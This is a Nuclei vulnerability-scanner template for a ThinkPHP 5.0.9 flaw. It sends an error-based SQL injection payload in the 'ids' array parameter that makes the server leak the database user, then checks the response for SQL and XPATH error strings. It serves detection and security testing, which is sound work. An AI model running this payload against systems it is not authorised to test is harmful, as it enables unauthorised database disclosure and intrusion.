id: thinkphp-509-information-disclosure

info:
  name: ThinkPHP 5.0.9 Information Disclosure
  author: dr_set
  severity: critical
  description: Verbose SQL error message reveals sensitive information including database credentials.
  reference: https://github.com/vulhub/vulhub/tree/0a0bc719f9a9ad5b27854e92bc4dfa17deea25b4/thinkphp/in-sqlinjection
  tags: thinkphp

requests:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?ids[0,updatexml(0,concat(0xa,user()),0)]=1"

    matchers-condition: and
    matchers:
      - type: word
        condition: and
        words:
          - "SQLSTATE"
          - "XPATH syntax error"

      - type: status
        status:
          - 500